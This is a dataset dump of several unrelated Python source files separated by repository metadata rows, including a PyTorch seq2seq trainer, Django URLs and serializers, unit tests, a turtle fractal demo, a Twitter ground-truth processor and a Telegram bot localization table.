# Run through decoder one time step at a time
for t in range(max_target_length):
decoder_output, decoder_hidden, decoder_attn = decoder(
decoder_input, decoder_hidden, encoder_outputs
)
all_decoder_outputs[t] = decoder_output
decoder_input = target_batches[t] # Next input is current target
# Loss calculation and backpropagation
# loss_cal = nn.BCELoss()
# loss = loss_cal(all_decoder_outputs, target_batches)
# print("target:", target_batches.size())
# print("output:", all_decoder_outputs.size())
loss = masked_cross_entropy(
all_decoder_outputs.transpose(0, 1).contiguous(), # -> batch x seq
target_batches.transpose(0, 1).contiguous(), # -> batch x seq
target_lengths
)
loss.backward()
# Clip gradient norms
ec = torch.nn.utils.clip_grad_norm_(encoder.parameters(), clip)
dc = torch.nn.utils.clip_grad_norm_(decoder.parameters(), clip)
# Update parameters with optimizers
encoder_optimizer.step()
decoder_optimizer.step()
return loss.item(), ec, dc
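# --- Hedged usage sketch (not part of the original file) ---
# A typical call site inside the outer training loop; `random_batch` is an assumed
# helper (e.g. from preprocess.py) that returns padded LongTensor batches plus lengths,
# and the encoder/decoder/optimizers/criterion are assumed to be constructed elsewhere:
#
#   input_batches, input_lengths, target_batches, target_lengths = random_batch(BATCH_SIZE)
#   loss, ec, dc = train(input_batches, input_lengths, target_batches, target_lengths,
#                        encoder, decoder, encoder_optimizer, decoder_optimizer, criterion)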
# # Evaluating the network
# def evaluate(input_seq, max_length=MAX_LENGTH):
def evaluate(input_batches, input_lengths, input_lang, output_lang, encoder, decoder, max_length=MAX_LENGTH):
# Set to not-training mode to disable dropout
encoder.train(False)
decoder.train(False)
# Run through encoder
encoder_outputs, encoder_hidden = encoder(
input_batches, input_lengths, None)
# Inference only, no back propagation
with torch.no_grad():
# Initialize decoder input
decoder_input = torch.LongTensor([SOS_index])
# Use last (forward) hidden state from encoder
decoder_hidden = encoder_hidden[:decoder.n_layers]
if USE_CUDA:
decoder_input = decoder_input.cuda()
# Store output words and attention states
output_sindices = []
decoder_attentions = torch.zeros(max_length + 1, max_length + 1)
# Run through decoder
for di in range(max_length):
decoder_output, decoder_hidden, decoder_attn = decoder(
decoder_input, decoder_hidden, encoder_outputs
)
decoder_attentions[di, :decoder_attn.size(
2)] += decoder_attn.squeeze(0).squeeze(0).cpu().data
# Choose top word from output
topv, topi = decoder_output.data.topk(1)
ni = topi[0][0]
# Extract number from pytorch variable
ni = ni.item()
output_sindices.append(ni)
if ni == EOS_index:
break
# Next input is chosen word
decoder_input = torch.LongTensor([ni])
if USE_CUDA:
decoder_input = decoder_input.cuda()
# Set back to training mode
encoder.train(True)
decoder.train(True)
return output_sindices, decoder_attentions[:di + 1, :len(encoder_outputs)]
def evaluate_and_show_attention(input_sentence, input_length, input_lang, output_lang,
target_batches, encoder, decoder, epoch):
sindices, attentions = evaluate(
input_sentence, input_length, input_lang, output_lang, encoder, decoder)
input_sentence = indices_to_sentence(input_lang, input_sentence)
output_sentence = indices_to_sentence(output_lang, sindices)
target_sentence = indices_to_sentence(output_lang, target_batches)
print_summary = 'Evaluation:'+'\n'
print_summary += ' in/src:' + input_sentence + '\n'
print_summary += ' out:' + output_sentence + '\n'
if target_sentence is not None:
print_summary += ' tgt:' + target_sentence + '\n'
show_attention(input_sentence, output_sentence, attentions, epoch)
return input_sentence, output_sentence, target_sentence
def show_attention(input_sentence, output_sentence, attentions, epoch):
# Set up figure with colorbar
# print(attentions)
fig = plt.figure()
ax = fig.add_subplot(111)
cax = ax.matshow(attentions.numpy(), cmap='bone')
fig.colorbar(cax)
# Set up axes
ax.set_xticklabels([''] + input_sentence.split(' '), rotation=90)
ax.set_yticklabels([''] + output_sentence.split(' '))
# Show label at every tick
ax.xaxis.set_major_locator(ticker.MultipleLocator(1))
ax.yaxis.set_major_locator(ticker.MultipleLocator(1))
fig.savefig(PLOT_PATH + '/epoch-%d.png' % epoch)
fig.savefig(PLOT_PATH + '/last.png')
# plt.show(block=True)
# plt.close()
| 34.20339
| 163
| 0.675421
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,427
| 0.235712
|
4204040a123c3ac5e25851793e3ded084eda1953
| 41
|
py
|
Python
|
ANNarchy_future/__init__.py
|
vitay/ANNarchy_future
|
2c2a43c67f4201cf72175793aaa51189d208436b
|
[
"MIT"
] | 2
|
2021-03-11T18:11:30.000Z
|
2021-05-12T09:15:17.000Z
|
ANNarchy_future/__init__.py
|
vitay/ANNarchy_future
|
2c2a43c67f4201cf72175793aaa51189d208436b
|
[
"MIT"
] | null | null | null |
ANNarchy_future/__init__.py
|
vitay/ANNarchy_future
|
2c2a43c67f4201cf72175793aaa51189d208436b
|
[
"MIT"
] | null | null | null |
from .api import *
__version__ = "5.0.0"
| 13.666667
| 21
| 0.658537
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0.170732
|
4204eade92e97699c25ced0425caa0cabd5da0e0
| 1,881
|
py
|
Python
|
pycqed/tests/analysis_v2/test_simple_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 60
|
2016-08-03T10:00:18.000Z
|
2021-11-10T11:46:16.000Z
|
pycqed/tests/analysis_v2/test_simple_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 512
|
2016-08-03T17:10:02.000Z
|
2022-03-31T14:03:43.000Z
|
pycqed/tests/analysis_v2/test_simple_analysis.py
|
nuttamas/PycQED_py3
|
1ee35c7428d36ed42ba4afb5d4bda98140b2283e
|
[
"MIT"
] | 34
|
2016-10-19T12:00:52.000Z
|
2022-03-19T04:43:26.000Z
|
import unittest
import pycqed as pq
import os
import matplotlib.pyplot as plt
from pycqed.analysis_v2 import measurement_analysis as ma
class Test_SimpleAnalysis(unittest.TestCase):
@classmethod
def tearDownClass(cls):
plt.close('all')
@classmethod
def setUpClass(cls):
cls.datadir = os.path.join(pq.__path__[0], 'tests', 'test_data')
ma.a_tools.datadir = cls.datadir
def test_1D_analysis_multi_file(self):
a = ma.Basic1DAnalysis(t_start='20170726_164507',
t_stop='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertTrue(len(a.timestamps) > 5)
def test_1D_analysis_single_file(self):
# giving only a single file
a = ma.Basic1DAnalysis(t_start='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertEqual(a.timestamps, ['20170726_164845'])
def test_2D_analysis_multi_file(self):
# N.B. by setting x2, x2_label and x2_unit in the options dict
# the values can be plotted versus the varied parameter between
# the linecuts
a = ma.Basic2DAnalysis(t_start='20170726_164521',
t_stop='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertTrue(len(a.timestamps) > 5)
def test_2D_interpolated(self):
a=ma.Basic2DInterpolatedAnalysis(t_start='20180522_030206')
fig_keys = list(a.figs.keys())
exp_list_keys = ['Cost function value', 'Conditional phase',
'offset difference']
self.assertEqual(fig_keys, exp_list_keys)
@unittest.skip('FIXME: disabled, see PR #643')
def test_1D_binned_analysis(self):
a=ma.Basic1DBinnedAnalysis(label='120543_Single_qubit_GST_QL')
| 36.882353
| 73
| 0.637959
| 1,742
| 0.926103
| 0
| 0
| 376
| 0.199894
| 0
| 0
| 491
| 0.261031
|
42064154fe3a3a9a5966ee89da5b64cd37de9197
| 781
|
py
|
Python
|
CS2/1275_turtle_recursion/2499_koch_snowflake/alternate_snowflake.py
|
nealholt/python_programming_curricula
|
eda4432dab97178b4a5712b160f5b1da74c068cb
|
[
"MIT"
] | 7
|
2020-10-14T03:23:12.000Z
|
2022-03-09T23:16:13.000Z
|
CS2/1275_turtle_recursion/2499_koch_snowflake/alternate_snowflake.py
|
nealholt/python_programming_curricula
|
eda4432dab97178b4a5712b160f5b1da74c068cb
|
[
"MIT"
] | null | null | null |
CS2/1275_turtle_recursion/2499_koch_snowflake/alternate_snowflake.py
|
nealholt/python_programming_curricula
|
eda4432dab97178b4a5712b160f5b1da74c068cb
|
[
"MIT"
] | 11
|
2021-02-21T20:50:56.000Z
|
2022-01-29T07:01:28.000Z
|
import turtle
'''http://www.algorithm.co.il/blogs/computer-science/fractals-in-10-minutes-no-6-turtle-snowflake/
This would be a good introduction to recursion. I don't see how students
would invent this on their own, but they could modify it and see what
other fractals they could generate.
'''
pen = turtle.Turtle()
pen.penup()
pen.goto(-200,0)
pen.pendown()
pen.speed(0)
def fractal(pen, length, depth):
#Base case
if depth == 0:
pen.forward(length)
#Recursive case
else:
fractal(pen, length/3, depth-1)
pen.right(60)
fractal(pen, length/3, depth-1)
pen.left(120)
fractal(pen, length/3, depth-1)
pen.right(60)
fractal(pen, length/3, depth-1)
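#Illustrative note (not part of the original): each recursion level replaces one segment
#with four, so depth d draws 4**d segments of length length/3**d -- e.g. depth 4 with
#length 500 draws 256 segments of roughly 6.17 units each.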
#Draw the fractal
fractal(pen, 500, 4)
turtle.done()
| 25.193548
| 98
| 0.663252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 323
| 0.413572
|
4206719b66d7095a812ba8babe145ead4c49882e
| 1,325
|
py
|
Python
|
test/test_edge.py
|
jbschwartz/spatial
|
04dc619ae024ebb4f516cd6483f835421c7d84b1
|
[
"MIT"
] | 1
|
2022-01-02T22:03:09.000Z
|
2022-01-02T22:03:09.000Z
|
test/test_edge.py
|
jbschwartz/spatial
|
04dc619ae024ebb4f516cd6483f835421c7d84b1
|
[
"MIT"
] | null | null | null |
test/test_edge.py
|
jbschwartz/spatial
|
04dc619ae024ebb4f516cd6483f835421c7d84b1
|
[
"MIT"
] | null | null | null |
import unittest
from spatial import Edge, Vector3
class TestEdge(unittest.TestCase):
def setUp(self) -> None:
self.start = Vector3(1, 2, 3)
self.end = Vector3(-1, -2, -3)
self.middle = Vector3(0, 0, 0)
self.edge = Edge(self.start, self.end)
def test__init__accepts_endpoints(self) -> None:
self.assertEqual(self.edge.start, self.start)
self.assertEqual(self.edge.end, self.end)
def test__eq__returns_true_for_edges_regardless_of_direction(self) -> None:
same_edge = Edge(self.start, self.end)
self.assertEqual(self.edge, same_edge)
opposite_edge = Edge(self.end, self.start)
self.assertEqual(self.edge, opposite_edge)
other_edge = Edge(self.start, self.middle)
self.assertNotEqual(other_edge, self.edge)
def test__eq__returns_notimplemented_for_incompatible_types(self) -> None:
self.assertTrue(self.edge.__eq__(2) == NotImplemented)
self.assertTrue(self.edge.__eq__("string") == NotImplemented)
def test_length_returns_the_length_of_the_edge(self) -> None:
self.assertEqual(self.edge.length, (self.start - self.end).length())
def test_vector_returns_the_vector_between_the_edges_endpoints(self) -> None:
self.assertEqual(self.edge.vector, self.end - self.start)
| 36.805556
| 81
| 0.695849
| 1,271
| 0.959245
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.006038
|
4206df5fe7ed10541de178c4f224f75754304f2c
| 324
|
py
|
Python
|
wdae/wdae/user_queries/urls.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
wdae/wdae/user_queries/urls.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | 82
|
2019-07-22T11:44:23.000Z
|
2022-01-13T15:27:33.000Z
|
wdae/wdae/user_queries/urls.py
|
iossifovlab/gpf
|
e556243d29666179dbcb72859845b4d6c011af2b
|
[
"MIT"
] | null | null | null |
from django.urls import re_path
from user_queries.views import UserQuerySaveView, UserQueryCollectView
urlpatterns = [
re_path(r"^/save/?$", UserQuerySaveView.as_view(), name="user-save-query"),
re_path(
r"^/collect/?$",
UserQueryCollectView.as_view(),
name="user-collect-queries",
),
]
| 27
| 79
| 0.675926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 66
| 0.203704
|
4207202cb690f62fcf73ad7c61a82a12bebf477d
| 419
|
py
|
Python
|
src/login/migrations/0017_auto_20191006_1716.py
|
vandana0608/Pharmacy-Managament
|
f99bdec11c24027a432858daa19247a21cecc092
|
[
"bzip2-1.0.6"
] | null | null | null |
src/login/migrations/0017_auto_20191006_1716.py
|
vandana0608/Pharmacy-Managament
|
f99bdec11c24027a432858daa19247a21cecc092
|
[
"bzip2-1.0.6"
] | null | null | null |
src/login/migrations/0017_auto_20191006_1716.py
|
vandana0608/Pharmacy-Managament
|
f99bdec11c24027a432858daa19247a21cecc092
|
[
"bzip2-1.0.6"
] | null | null | null |
# Generated by Django 2.0.7 on 2019-10-06 11:46
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0016_auto_20191006_1715'),
]
operations = [
migrations.AlterField(
model_name='login',
name='logout',
field=models.DateTimeField(default=datetime.datetime.now),
),
]
| 20.95
| 70
| 0.620525
| 310
| 0.739857
| 0
| 0
| 0
| 0
| 0
| 0
| 94
| 0.224344
|
4208848cd73eaf4015f90f42e112e861d94326ec
| 1,846
|
py
|
Python
|
InfoGain.py
|
gsndr/AIDA
|
538caf3ddb5aec8ec8904dc313eb7e31759f5154
|
[
"MIT"
] | 4
|
2021-05-10T11:35:51.000Z
|
2021-12-29T00:56:35.000Z
|
InfoGain.py
|
gsndr/AIDA
|
538caf3ddb5aec8ec8904dc313eb7e31759f5154
|
[
"MIT"
] | null | null | null |
InfoGain.py
|
gsndr/AIDA
|
538caf3ddb5aec8ec8904dc313eb7e31759f5154
|
[
"MIT"
] | 1
|
2021-12-25T13:55:29.000Z
|
2021-12-25T13:55:29.000Z
|
import pandas as pd
from math import log
class InfoGain():
def __init__(self, path):
self._path=path
def extractVariables(self):
self._df = pd.read_csv(self._path + ".csv");
# put the original column names in a python list
'''if 'Unnamed: 0' in self._df.columns:
self._df = self._df.drop(columns=['Unnamed: 0']);
if 'Unnamed: 0.1' in self._df.columns:
self._df = self._df.drop(columns=['Unnamed: 0.1']);
'''
self._categories=list(self._df.columns.values)
print(self._categories)
self._totalRows=self._df.count()
def splitCategories(self):
self._dfNormal=self._df
def entropy(pi):
'''
pi is an array that contain classifications
return the Entropy of a probability distribution:
entropy(p) = − SUM (Pi * log(Pi) )
definition:
entropy is a metric that measures the uncertainty of a probability distribution.
entropy ranges between 0 and 1 (for two classes)
Low entropy means the distribution is concentrated (sharp peaks and valleys).
High entropy means the distribution is close to uniform.
See:
http://www.cs.csi.cuny.edu/~imberman/ai/Entropy%20and%20Information%20Gain.htm
'''
total = 0
for p in pi:
p = p / sum(pi)
if p != 0:
total += p * log(p, 2)
else:
total += 0
total *= -1
return total
def gain(d, a):
'''
return the information gain:
gain(D, A) = entropy(D)− SUM ( |Di| / |D| * entropy(Di) )
'''
total = 0
for v in a:
total += sum(v) / sum(d) * InfoGain.entropy(v)
gain = InfoGain.entropy(d) - total
return gain
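if __name__ == "__main__":
    # Hedged worked example (not part of the original file): the classic 9-vs-5 class split.
    # entropy([9, 5]) is about 0.940 bits; partitioning into [6, 2] and [3, 3] leaves a
    # weighted entropy of about 0.892, so the information gain is about 0.048.
    print(InfoGain.entropy([9, 5]))
    print(InfoGain.gain([9, 5], [[6, 2], [3, 3]]))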
| 29.301587
| 98
| 0.531419
| 1,809
| 0.976255
| 0
| 0
| 0
| 0
| 0
| 0
| 1,006
| 0.542903
|
4208c41522c79409c03ff3e274e65ad419a2c482
| 4,473
|
py
|
Python
|
bot/localization.py
|
Supportiii/telegram-report-bot
|
6a050caafb1c205c0fd58f91be9264f1190ea706
|
[
"MIT"
] | null | null | null |
bot/localization.py
|
Supportiii/telegram-report-bot
|
6a050caafb1c205c0fd58f91be9264f1190ea706
|
[
"MIT"
] | null | null | null |
bot/localization.py
|
Supportiii/telegram-report-bot
|
6a050caafb1c205c0fd58f91be9264f1190ea706
|
[
"MIT"
] | null | null | null |
strings = {
"en": {
"error_no_reply": "This command must be sent as a reply to one's message!",
"error_report_admin": "Whoa! Don't report admins 😈",
"error_restrict_admin": "You cannot restrict an admin.",
"report_date_format": "%d.%m.%Y at %H:%M",
"report_message": '👆 Sent {time} (server time)\n'
'<a href="{msg_url}">Go to message</a>',
"report_note": "\n\nNote: {note}",
"report_sent": "<i>Report sent</i>",
"action_del_msg": "Delete message",
"action_del_and_ban": "Delete and ban",
"action_deleted": "\n\n🗑 <b>Deleted</b>",
"action_deleted_banned": "\n\n🗑❌ <b>Deleted, user banned</b>",
"action_deleted_partially": "Some messages couldn't be found or deleted",
"readonly_forever": "🙊 <i>User set to read-only mode forever</i>",
"readonly_temporary": "🙊 <i>User set to read-only mode until {time} (server time)</i>",
"nomedia_forever": "🖼 <i>User set to text-only mode forever</i>",
"nomedia_temporary": "🖼 <i>User set to text-only mode until {time} (server time)</i>",
"need_admins_attention": 'Dear admins, your presence in chat is needed!\n\n'
'<a href="{msg_url}">Go to chat</a>',
},
"ru": {
"error_no_reply": "Эта команда должна быть ответом на какое-либо сообщение!",
"error_report_admin": "Админов репортишь? Ай-ай-ай 😈",
"error_restrict_admin": "Невозможно ограничить администратора.",
"report_date_format": "%d.%m.%Y в %H:%M",
"report_message": '👆 Отправлено {time} (время серверное)\n'
'<a href="{msg_url}">Перейти к сообщению</a>',
"report_note": "\n\nПримечание: {note}",
"report_sent": "<i>Жалоба отправлена администраторам</i>",
"action_del_msg": "Удалить сообщение",
"action_del_and_ban": "Удалить и забанить",
"action_deleted": "\n\n🗑 <b>Удалено</b>",
"action_deleted_banned": "\n\n🗑❌ <b>Удалено, юзер забанен</b>",
"action_deleted_partially": "Не удалось найти или удалить некоторые сообщения",
"readonly_forever": "🙊 <i>Пользователь переведён в режим «только чтение» навсегда</i>",
"readonly_temporary": "🙊 <i>Пользователь переведён в режим «только чтение» до {time} (время серверное)</i>",
"nomedia_forever": "🖼 <i>Пользователю запрещено отправлять медиафайлы навсегда</i>",
"nomedia_temporary": "🖼 <i>Пользователю запрещено отправлять медиафайлы до {time} (время серверное)</i>",
"need_admins_attention": 'Товарищи админы, в чате нужно ваше присутствие!\n\n'
'<a href="{msg_url}">Перейти к чату</a>',
},
"de": {
"error_no_reply": "Dieser Befehl kann nur als Antwort gesendet werden!",
"error_report_admin": "Whoa! Du kannst Admins nicht melden 😈",
"error_restrict_admin": "Du kannst keine Admins einschränken.",
"report_date_format": "%d.%m.%Y um %H:%M Uhr",
"report_message": '👆 Gesendet {time} (server time)\n'
'<a href="{msg_url}">Zur Nachricht</a>',
"report_note": "\n\nNotiz: {note}",
"report_sent": "<i>Gemeldet</i>",
"action_del_msg": "Nachricht löschen",
"action_del_and_ban": "Löschen und Sperren",
"action_deleted": "\n\n🗑 <b>Löschen</b>",
"action_deleted_banned": "\n\n🗑❌ <b>Gelöscht, Nutzer gesperrt!</b>",
"action_deleted_partially": "Einige Nachrichten wurden nicht gefunden zum löschen",
"readonly_forever": "🙊 <i>Nutzer ist für immer stumm</i>",
"readonly_temporary": "🙊 <i>Nutzer bis {time} stumm. (server time)</i>",
"nomedia_forever": "🖼 <i>Nutzer für immer im Nur-Text-Modus.</i>",
"nomedia_temporary": "🖼 <i>Nutzer bis {time} im nur Text-Modus. (server time)</i>",
"need_admins_attention": 'Liebe Admins, ich sehne euch herbei!\n\n'
'<a href="{msg_url}">Zum Chat</a>',
}
}

def get_string(lang: str, key: str):
lang = strings.get(lang)
if not lang:
if not strings.get("en"):
raise KeyError(f'Neither "{lang}" nor "en" locales found')
else:
lang = strings.get("en")
try:
return lang[key]
except KeyError:
return strings.get("en").get(key, "ERR_NO_STRING")
| 47.585106
| 116
| 0.591549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,915
| 0.766595
|
4209d56bec0f4b46b06778591fc9cb1f2f7511a5
| 3,140
|
py
|
Python
|
swagger_server/models/linecode_r_matrix.py
|
garagonc/simulation-engine
|
c129f0bf601e0d56d924c9e5fa2cf94f7e31a356
|
[
"Apache-2.0"
] | 3
|
2019-06-24T09:02:21.000Z
|
2020-01-30T10:37:46.000Z
|
swagger_server/models/linecode_r_matrix.py
|
linksmart/simulation-engine
|
c129f0bf601e0d56d924c9e5fa2cf94f7e31a356
|
[
"Apache-2.0"
] | null | null | null |
swagger_server/models/linecode_r_matrix.py
|
linksmart/simulation-engine
|
c129f0bf601e0d56d924c9e5fa2cf94f7e31a356
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server.models.impedance import Impedance # noqa: F401,E501
from swagger_server import util
class LinecodeRMatrix(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, phase_r: Impedance=None, phase_s: Impedance=None, phase_t: Impedance=None): # noqa: E501
"""LinecodeRMatrix - a model defined in Swagger
:param phase_r: The phase_r of this LinecodeRMatrix. # noqa: E501
:type phase_r: Impedance
:param phase_s: The phase_s of this LinecodeRMatrix. # noqa: E501
:type phase_s: Impedance
:param phase_t: The phase_t of this LinecodeRMatrix. # noqa: E501
:type phase_t: Impedance
"""
self.swagger_types = {
'phase_r': Impedance,
'phase_s': Impedance,
'phase_t': Impedance
}
self.attribute_map = {
'phase_r': 'phase_R',
'phase_s': 'phase_S',
'phase_t': 'phase_T'
}
self._phase_r = phase_r
self._phase_s = phase_s
self._phase_t = phase_t
@classmethod
def from_dict(cls, dikt) -> 'LinecodeRMatrix':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The Linecode_R_Matrix of this LinecodeRMatrix. # noqa: E501
:rtype: LinecodeRMatrix
"""
return util.deserialize_model(dikt, cls)
@property
def phase_r(self) -> Impedance:
"""Gets the phase_r of this LinecodeRMatrix.
:return: The phase_r of this LinecodeRMatrix.
:rtype: Impedance
"""
return self._phase_r
@phase_r.setter
def phase_r(self, phase_r: Impedance):
"""Sets the phase_r of this LinecodeRMatrix.
:param phase_r: The phase_r of this LinecodeRMatrix.
:type phase_r: Impedance
"""
self._phase_r = phase_r
@property
def phase_s(self) -> Impedance:
"""Gets the phase_s of this LinecodeRMatrix.
:return: The phase_s of this LinecodeRMatrix.
:rtype: Impedance
"""
return self._phase_s
@phase_s.setter
def phase_s(self, phase_s: Impedance):
"""Sets the phase_s of this LinecodeRMatrix.
:param phase_s: The phase_s of this LinecodeRMatrix.
:type phase_s: Impedance
"""
self._phase_s = phase_s
@property
def phase_t(self) -> Impedance:
"""Gets the phase_t of this LinecodeRMatrix.
:return: The phase_t of this LinecodeRMatrix.
:rtype: Impedance
"""
return self._phase_t
@phase_t.setter
def phase_t(self, phase_t: Impedance):
"""Sets the phase_t of this LinecodeRMatrix.
:param phase_t: The phase_t of this LinecodeRMatrix.
:type phase_t: Impedance
"""
self._phase_t = phase_t
| 26.610169
| 112
| 0.62293
| 2,828
| 0.900637
| 0
| 0
| 1,742
| 0.554777
| 0
| 0
| 1,743
| 0.555096
|
420b2687d1f426ed1eefef8109dac3c6ae18bab7
| 261
|
py
|
Python
|
workshop/serializers.py
|
shivammaniharsahu/django_api
|
6ffb3d9f70f30f5fd3ae06ec00a6dd7c7783a797
|
[
"bzip2-1.0.6"
] | null | null | null |
workshop/serializers.py
|
shivammaniharsahu/django_api
|
6ffb3d9f70f30f5fd3ae06ec00a6dd7c7783a797
|
[
"bzip2-1.0.6"
] | null | null | null |
workshop/serializers.py
|
shivammaniharsahu/django_api
|
6ffb3d9f70f30f5fd3ae06ec00a6dd7c7783a797
|
[
"bzip2-1.0.6"
] | null | null | null |
from rest_framework import serializers
from .models import Register
class RegisterSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Register
fields = ('id', 'name', 'email', 'contact', 'password', 'confirm_password')
| 29
| 83
| 0.724138
| 190
| 0.727969
| 0
| 0
| 0
| 0
| 0
| 0
| 54
| 0.206897
|
420ceb4ff961d4330b357c01567c2e654e43d336
| 5,303
|
py
|
Python
|
experiments/twitter_event_data_2019/evaluation/groundtruth_processor.py
|
HHansi/WhatsUp
|
87c3eb90570d2f997d8f1abc300a3553f8ef7ca9
|
[
"Apache-2.0"
] | null | null | null |
experiments/twitter_event_data_2019/evaluation/groundtruth_processor.py
|
HHansi/WhatsUp
|
87c3eb90570d2f997d8f1abc300a3553f8ef7ca9
|
[
"Apache-2.0"
] | null | null | null |
experiments/twitter_event_data_2019/evaluation/groundtruth_processor.py
|
HHansi/WhatsUp
|
87c3eb90570d2f997d8f1abc300a3553f8ef7ca9
|
[
"Apache-2.0"
] | null | null | null |
# Created by Hansi at 3/16/2020
import os
from algo.data_process.data_preprocessor import data_cleaning_flow
from algo.utils.file_utils import delete_create_folder
def extract_gt_tokens(text):
"""
Given GT string, method to extract GT labels.
GT string should be formatted as Twitter-Event-Data-2019.
parameters
-----------
:param text: str
:return: list
List of GT labels corresponding to a single event
Since there can be duplicate definitions for a single event, this list contains separate label lists for each
duplicate definition.
"""
duplicates = []
for element in text.split("|"):
labels = []
for subelement in element.split("["):
if subelement:
subelement = subelement.replace("\n", "")
subelement = subelement.replace("]", "")
tokens = subelement.split(",")
labels.append(tokens)
duplicates.append(labels)
return duplicates
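# Hedged illustration (not part of the original file): for an illustrative GT line such as
#   "[a,b][c]|[a,d]"
# extract_gt_tokens returns [[['a', 'b'], ['c']], [['a', 'd']]] -- one entry per duplicate
# definition (split on '|'), each holding its '['...']' label groups split on ','.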
def load_gt(folder_path):
"""
Method to read GT data into a dictionary formatted as {time-window: labels}
parameters
-----------
:param folder_path: str
Path to folder which contains GT data
:return: object
Dictionary of GT data
"""
gt = dict()
for root, dirs, files in os.walk(folder_path):
for file in files:
file_name = os.path.splitext(file)[0]
f = open(os.path.join(folder_path, file), 'r', encoding='utf-8')
events = []
for line in f:
tokens = extract_gt_tokens(line)
events.append(tokens)
gt[file_name] = events
f.close()
return gt
def generate_gt_string(tokens):
"""
Given a list of GT labels corresponding to a single event, convert them to a string formatted according to
Twitter-Event-Data-2019 GT format.
parameters
-----------
:param tokens: list
:return: str
"""
str = ""
for duplicate in tokens:
if str and str[-1] == "]":
str = str + "|"
for label in duplicate:
str = str + "["
for element in label:
if str[-1] == "[":
str = str + element
else:
str = str + "," + element
str = str + "]"
return str
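# Hedged round-trip note (not part of the original file): generate_gt_string acts as the
# inverse of extract_gt_tokens for well-formed input, e.g.
#   generate_gt_string(extract_gt_tokens("[a,b][c]|[a,d]")) == "[a,b][c]|[a,d]"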
def get_combined_gt(gt):
"""
Combine the GT labels of multiple events available in a time frame into a single event representation.
parameters
-----------
:param gt: object
Dictionary of GT returned by load_GT
:return: object
Dictionary of combined GT
"""
combined_gt = dict()
for time_frame in gt.keys():
gt_events = gt[time_frame]
combined_gt_event = gt_events[0]
for event in gt_events[1:]:
temp = []
for duplicate in event:
for combined_event in combined_gt_event:
temp.append(combined_event + duplicate)
combined_gt_event = temp
# even though there is 1 event, it is added to a list to preserve consistency with general evaluation_v2 methods
events = [combined_gt_event]
combined_gt[time_frame] = events
return combined_gt
def preprocess_gt(input_filepath, output_filepath):
"""
Preprocess ground truth data in input_file and save to the output_file
parameters
-----------
:param input_filepath: str (.txt file path)
Ground truth file formatted as Twitter-Event-Data-2019
:param output_filepath: str (.txt file path)
:return:
"""
input_file = open(input_filepath, 'r')
output_file = open(output_filepath, 'a', encoding='utf-8')
events = []
for line in input_file:
tokens = extract_gt_tokens(line)
events.append(tokens)
# update tokens
new_events = []
for event in events:
new_duplicates = []
for duplicate in event:
new_labels = []
for label in duplicate:
new_elements = []
for element in label:
new_label = data_cleaning_flow(element)
new_elements.append(new_label)
new_labels.append(new_elements)
new_duplicates.append(new_labels)
new_events.append(new_duplicates)
for event in new_events:
str = generate_gt_string(event)
output_file.write(str)
output_file.write("\n")
output_file.close()
def preprocess_gt_bulk(input_folder_path, output_folder_path):
"""
Preprocess ground truth data in all files in input_folder and save to the output_folder
parameters
-----------
:param input_folder_path: str
Path to folder which contains GT data files
:param output_folder_path: str
Path to folder to save preprocessed GT data
:return:
"""
# delete the folder if it already exists and create a new one
delete_create_folder(output_folder_path)
for root, dirs, files in os.walk(input_folder_path):
for file in files:
input_filepath = os.path.join(input_folder_path, file)
output_filepath = os.path.join(output_folder_path, file)
preprocess_gt(input_filepath, output_filepath)
| 30.302857
| 120
| 0.603998
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,049
| 0.386385
|
420d148bc469105cd3d8585bbbb8f38f1d6ec875
| 2,058
|
py
|
Python
|
metaflow/plugins/env_escape/configurations/test_lib_impl/test_lib.py
|
RobBlumberg/metaflow
|
9f737e6026eee250c1593a2cb1d1c4b19a00adf4
|
[
"Apache-2.0"
] | 5,821
|
2019-12-03T17:57:52.000Z
|
2022-03-31T22:55:12.000Z
|
metaflow/plugins/env_escape/configurations/test_lib_impl/test_lib.py
|
RobBlumberg/metaflow
|
9f737e6026eee250c1593a2cb1d1c4b19a00adf4
|
[
"Apache-2.0"
] | 605
|
2019-12-03T23:09:32.000Z
|
2022-03-31T16:15:05.000Z
|
metaflow/plugins/env_escape/configurations/test_lib_impl/test_lib.py
|
RobBlumberg/metaflow
|
9f737e6026eee250c1593a2cb1d1c4b19a00adf4
|
[
"Apache-2.0"
] | 539
|
2019-12-03T18:25:53.000Z
|
2022-03-29T18:22:33.000Z
|
import functools
class MyBaseException(Exception):
pass
class SomeException(MyBaseException):
pass
class TestClass1(object):
cls_object = 25
def __init__(self, value):
self._value = value
self._value2 = 123
def unsupported_method(self):
pass
def print_value(self):
return self._value
def __str__(self):
return "My str representation is %s" % str(self._value)
def __repr__(self):
return "My repr representation is %s" % str(self._value)
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
def to_class2(self, count, stride=1):
return TestClass2(self._value, stride, count)
@staticmethod
def somethingstatic(val):
return val + 42
@classmethod
def somethingclass(cls):
return cls.cls_object
@property
def override_value(self):
return self._value2
@override_value.setter
def override_value(self, value):
self._value2 = value
class TestClass2(object):
def __init__(self, value, stride, count):
